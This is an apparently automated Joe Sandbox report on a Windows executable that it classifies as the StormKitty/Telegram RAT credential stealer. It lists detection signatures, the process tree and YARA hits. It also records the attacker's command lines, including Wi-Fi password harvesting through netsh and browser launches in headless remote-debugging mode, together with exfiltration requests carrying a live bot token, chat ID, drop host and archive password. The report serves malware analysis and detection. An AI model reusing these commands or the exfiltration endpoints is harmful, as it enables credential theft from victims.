Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
bc7EKCf.exe

Overview

General Information

Sample name:bc7EKCf.exe
Analysis ID:1586583
MD5:c042e73bc713b483058772dabf080733
SHA1:06f64d679249be4d555fc81e495b871b09b98976
SHA256:01dc20c640b1a5d41354f57e06b324ff2a5753cd1ef98c5f5773c5475284e27d
Tags:AgentTeslaexemalwaretrojanuser-Joker
Infos:

Detection

StormKitty
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected StormKitty Stealer
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies existing user documents (likely ransomware behavior)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Execution In Headless Mode
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious desktop.ini Action
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • bc7EKCf.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\bc7EKCf.exe" MD5: C042E73BC713B483058772DABF080733)
    • bc7EKCf.exe (PID: 7536 cmdline: "C:\Users\user\Desktop\bc7EKCf.exe" MD5: C042E73BC713B483058772DABF080733)
      • chrome.exe (PID: 7824 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 8092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-logging --mojo-platform-channel-handle=2052 --field-trial-handle=2016,i,4566184230407132723,17088106052091521409,262144 --disable-features=PaintHolding /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • cmd.exe (PID: 7924 cmdline: "cmd.exe" /c /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5868 cmdline: "cmd.exe" /c /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msedge.exe (PID: 4432 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-gpu --disable-logging MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 1028 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=2120 --field-trial-handle=2020,i,1680887362715709972,4906417747234883006,262144 --disable-features=PaintHolding /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • cmd.exe (PID: 8644 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tmp305C.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp305C.tmp.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 1352 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
        • taskkill.exe (PID: 8648 cmdline: TaskKill /F /PID 7536 MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • timeout.exe (PID: 7276 cmdline: Timeout /T 2 /Nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • msiexec.exe (PID: 7832 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • msedge.exe (PID: 8032 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-gpu --disable-logging --noerrdialogs --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8124 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=2196 --field-trial-handle=1964,i,8074184847373783522,14194302951610338589,262144 --disable-features=PaintHolding /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8748 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=6436 --field-trial-handle=1964,i,8074184847373783522,14194302951610338589,262144 --disable-features=PaintHolding /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8772 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=6760 --field-trial-handle=1964,i,8074184847373783522,14194302951610338589,262144 --disable-features=PaintHolding /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • identity_helper.exe (PID: 8880 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=7280 --field-trial-handle=1964,i,8074184847373783522,14194302951610338589,262144 --disable-features=PaintHolding /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
    • identity_helper.exe (PID: 8936 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=7280 --field-trial-handle=1964,i,8074184847373783522,14194302951610338589,262144 --disable-features=PaintHolding /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
    • msedge.exe (PID: 5084 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=6800 --field-trial-handle=1964,i,8074184847373783522,14194302951610338589,262144 --disable-features=PaintHolding /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Cameleon, StormKittyPWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon
{"C2 url": "https://api.telegram.org/bot7831867283:AAEopA7q0c646Jx2HXjB55s1f-y8Uh1Ze0I/sendMessage"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1799849511.0000000004CE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.1799849511.0000000004CE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
      00000000.00000002.1799849511.0000000004CE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.1799849511.0000000004CE1000.00000004.00000800.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_Discord_RegexDetects executables referencing Discord tokens regular expressionsditekSHen
        • 0x289bfa:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
        00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          Click to see the 22 entries
          SourceRuleDescriptionAuthorStrings
          0.2.bc7EKCf.exe.4ce1eb0.3.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            0.2.bc7EKCf.exe.4ce1eb0.3.raw.unpackJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
              0.2.bc7EKCf.exe.4ce1eb0.3.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.bc7EKCf.exe.4ce1eb0.3.raw.unpackinfostealer_win_stormkittyFinds StormKitty samples (or their variants) based on specific stringsSekoia.io
                • 0x2725d3:$sk01: LimerBoy/StormKitty
                • 0x27f71c:$str04: WritePasswords
                • 0x280866:$str04: WritePasswords
                • 0x280981:$str04: WritePasswords
                • 0x27f95c:$str05: WriteCookies
                • 0x2808f4:$str05: WriteCookies
                • 0x27fcd3:$str06: sChromiumPswPaths
                • 0x27fcc0:$str07: sGeckoBrowserPaths
                • 0x281fee:$str08: Username: {1}
                • 0x2854e8:$str09: Password: {2}
                • 0x286a98:$str10: encrypted_key":"(.*?)"
                0.2.bc7EKCf.exe.4ce1eb0.3.raw.unpackINDICATOR_SUSPICIOUS_EXE_Discord_RegexDetects executables referencing Discord tokens regular expressionsditekSHen
                • 0x288d4a:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
                Click to see the 13 entries

                System Summary

                barindex
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging, CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\bc7EKCf.exe", ParentImage: C:\Users\user\Desktop\bc7EKCf.exe, ParentProcessId: 7536, ParentProcessName: bc7EKCf.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging, ProcessId: 7824, ProcessName: chrome.exe
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging, CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\bc7EKCf.exe", ParentImage: C:\Users\user\Desktop\bc7EKCf.exe, ParentProcessId: 7536, ParentProcessName: bc7EKCf.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging, ProcessId: 7824, ProcessName: chrome.exe
                Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging, CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\bc7EKCf.exe", ParentImage: C:\Users\user\Desktop\bc7EKCf.exe, ParentProcessId: 7536, ParentProcessName: bc7EKCf.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging, ProcessId: 7824, ProcessName: chrome.exe
                Source: File createdAuthor: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO): Data: EventID: 11, Image: C:\Users\user\Desktop\bc7EKCf.exe, ProcessId: 7536, TargetFilename: C:\Users\user\AppData\Local\66e2c348b6a124791b4c494163efaaeb\user@618321_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

                Stealing of Sensitive Information

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /c /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /c /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\bc7EKCf.exe", ParentImage: C:\Users\user\Desktop\bc7EKCf.exe, ParentProcessId: 7536, ParentProcessName: bc7EKCf.exe, ProcessCommandLine: "cmd.exe" /c /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 7924, ProcessName: cmd.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-09T10:59:27.526160+010018100071Potentially Bad Traffic192.168.2.460920149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: bc7EKCf.exeAvira: detected
                Source: bc7EKCf.exe.7536.2.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7831867283:AAEopA7q0c646Jx2HXjB55s1f-y8Uh1Ze0I/sendMessage"}
                Source: bc7EKCf.exeVirustotal: Detection: 31%Perma Link
                Source: bc7EKCf.exeReversingLabs: Detection: 34%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: bc7EKCf.exeJoe Sandbox ML: detected
                Source: bc7EKCf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: bc7EKCf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: winload_prod.pdb source: Temp.txt.2.dr
                Source: Binary string: /_/artifacts/obj/System.Memory/Release/net462/System.Memory.pdbSHA256* source: bc7EKCf.exe, 00000002.00000002.2010903453.00000000081EB000.00000004.00000020.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1985383738.0000000004119000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1976480263.00000000036D2000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.2008008650.0000000007C10000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.IO.Pipelines/Release/net462/System.IO.Pipelines.pdbSHA256 source: bc7EKCf.exe, 00000002.00000002.2012775385.0000000008B00000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Text.Encodings.Web/Release/net462/System.Text.Encodings.Web.pdbSHA256 source: bc7EKCf.exe, 00000002.00000002.2009256026.0000000007FB0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: ntkrnlmp.pdb source: Temp.txt.2.dr
                Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.2.dr
                Source: Binary string: /_/src/Nito.Disposables/obj/Release/net461/Nito.Disposables.pdbSHA256N source: bc7EKCf.exe, 00000002.00000002.1995301685.00000000056E0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: costura.costura.pdb.compressed source: bc7EKCf.exe, 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1976480263.00000000030F1000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed/icsharpcode.sharpziplib]costura.icsharpcode.sharpziplib.dll.compressed;microsoft.bcl.asyncinterfacesicostura.microsoft.bcl.asyncinterfaces.dll.compressed+microsoft.data.sqliteYcostura.microsoft.data.sqlite.dll.compressed9microsoft.web.infrastructuregcostura.microsoft.web.infrastructure.dll.compressed source: bc7EKCf.exe, 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Buffers/Release/net462/System.Buffers.pdbSHA256W source: bc7EKCf.exe, 00000002.00000002.2009530198.0000000007FD0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Memory/Release/net462/System.Memory.pdb source: bc7EKCf.exe, 00000002.00000002.2010903453.00000000081EB000.00000004.00000020.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1985383738.0000000004119000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1976480263.00000000036D2000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.2008008650.0000000007C10000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/src/Nito.Disposables/obj/Release/net461/Nito.Disposables.pdb source: bc7EKCf.exe, 00000002.00000002.1995301685.00000000056E0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/src/Nito.AsyncEx.Context/obj/Release/net461/Nito.AsyncEx.Context.pdbSHA256 source: bc7EKCf.exe, 00000002.00000002.1976369045.00000000030B0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\Release\net462\System.Runtime.CompilerServices.Unsafe.pdb source: bc7EKCf.exe, 00000002.00000002.2008803844.0000000007E50000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/Release/net462/Microsoft.Bcl.AsyncInterfaces.pdbSHA256 source: bc7EKCf.exe, 00000002.00000002.2010931634.0000000008420000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/src/Nito.AsyncEx.Tasks/obj/Release/net461/Nito.AsyncEx.Tasks.pdbSHA256 source: bc7EKCf.exe, 00000002.00000002.1976402820.00000000030C0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/src/Nito.AsyncEx.Tasks/obj/Release/net461/Nito.AsyncEx.Tasks.pdb source: bc7EKCf.exe, 00000002.00000002.1976402820.00000000030C0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/src/Nito.AsyncEx.Context/obj/Release/net461/Nito.AsyncEx.Context.pdb source: bc7EKCf.exe, 00000002.00000002.1976369045.00000000030B0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\Release\net462\System.Runtime.CompilerServices.Unsafe.pdbBSJB source: bc7EKCf.exe, 00000002.00000002.2008803844.0000000007E50000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: winload_prod.pdb\ source: Temp.txt.2.dr
                Source: Binary string: /_/artifacts/obj/System.Text.Json/Release/net462/System.Text.Json.pdb source: bc7EKCf.exe, 00000002.00000002.1976480263.000000000368C000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.2011473460.0000000008A10000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Text.Encodings.Web/Release/net462/System.Text.Encodings.Web.pdb source: bc7EKCf.exe, 00000002.00000002.2009256026.0000000007FB0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Buffers/Release/net462/System.Buffers.pdb source: bc7EKCf.exe, 00000002.00000002.2009530198.0000000007FD0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Text.Json/Release/net462/System.Text.Json.pdbSHA256 source: bc7EKCf.exe, 00000002.00000002.1976480263.000000000368C000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.2011473460.0000000008A10000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: prod.pdb\*/i source: bc7EKCf.exe, 00000002.00000002.1996132099.0000000005D51000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Threading.Tasks.Extensions\netfx\System.Threading.Tasks.Extensions.pdb source: bc7EKCf.exe, 00000002.00000002.1976480263.000000000368C000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.2007888532.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1976480263.00000000036D2000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/Release/net462/Microsoft.Bcl.AsyncInterfaces.pdb source: bc7EKCf.exe, 00000002.00000002.2010931634.0000000008420000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|806F4C19B2D7FD9E3B836269EC07647019A29E95|7960 source: bc7EKCf.exe, 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.IO.Pipelines/Release/net462/System.IO.Pipelines.pdb source: bc7EKCf.exe, 00000002.00000002.2012775385.0000000008B00000.00000004.08000000.00040000.00000000.sdmp
                Source: chrome.exeMemory has grown: Private usage: 6MB later: 39MB

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:60920 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficTCP traffic: 192.168.2.4:60841 -> 1.1.1.1:53
                Source: global trafficHTTP traffic detected: GET /bot7831867283:AAEopA7q0c646Jx2HXjB55s1f-y8Uh1Ze0I/getMe HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot7831867283:AAEopA7q0c646Jx2HXjB55s1f-y8Uh1Ze0I/sendMessage?chat_id=-1002445444966&text=%F0%9F%94%8D%20System%20Report%0A%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0A%F0%9F%97%93%EF%B8%8F%20Date%3A%202025-01-09%204%3A59%3A04%20am%0A%F0%9F%96%A5%EF%B8%8F%20Operating%20System%3A%20Windows%2010%20Pro%20%2864%20Bit%29%0A%F0%9F%91%A4%20User%20Name%3A%20user%0A%F0%9F%92%BB%20Computer%20Name%3A%20618321%0A%F0%9F%8C%90%20IP%20Address%3A%208.46.123.189%0A%F0%9F%8C%8D%20Language%20and%20Region%3A%20%F0%9F%87%A8%F0%9F%87%AD%20-%20en-CH%0A%F0%9F%9B%A1%EF%B8%8F%20AV%3A%20Windows%20Defender.%0A%0A%E2%96%B6%EF%B8%8F%20Keywords%0A%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0A%0A%20%20%20%E2%88%9F%20Keywords%20%28No%20data%29%0A%0A%E2%96%B6%EF%B8%8F%20Browser%20and%20Application%20Data%0A%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0A%0A%20%20%20%E2%88%9F%20%F0%9F%8D%AA%20Cookies%3A%2010%0A%20%20%20%E2%88%9F%20%F0%9F%93%9C%20Browsing%20History%3A%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks%3A%205%0A%0A%E2%96%B6%EF%B8%8F%20Software%20and%20Account%20Info%0A%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0A%0A%0A%F0%9F%94%97%20%5BDownload%20Archived%20Data%5D%28http%3A%2F%2Fgetwin11.com%2Fnull%2Fuser%40618321_en-CH.zip%29%0A%F0%9F%94%90%20Archive%20Password%3A%20%22103e3ba0017c0e70b446b0109ac853f8%22&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /asd.php HTTP/1.1X-Auth-Token: v0idContent-Type: multipart/form-data; boundary="798e131b-5666-4510-adaa-0353ec848408"Host: getwin11.comContent-Length: 503Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 18.244.18.27 18.244.18.27
                Source: Joe Sandbox ViewIP Address: 18.238.49.74 18.238.49.74
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
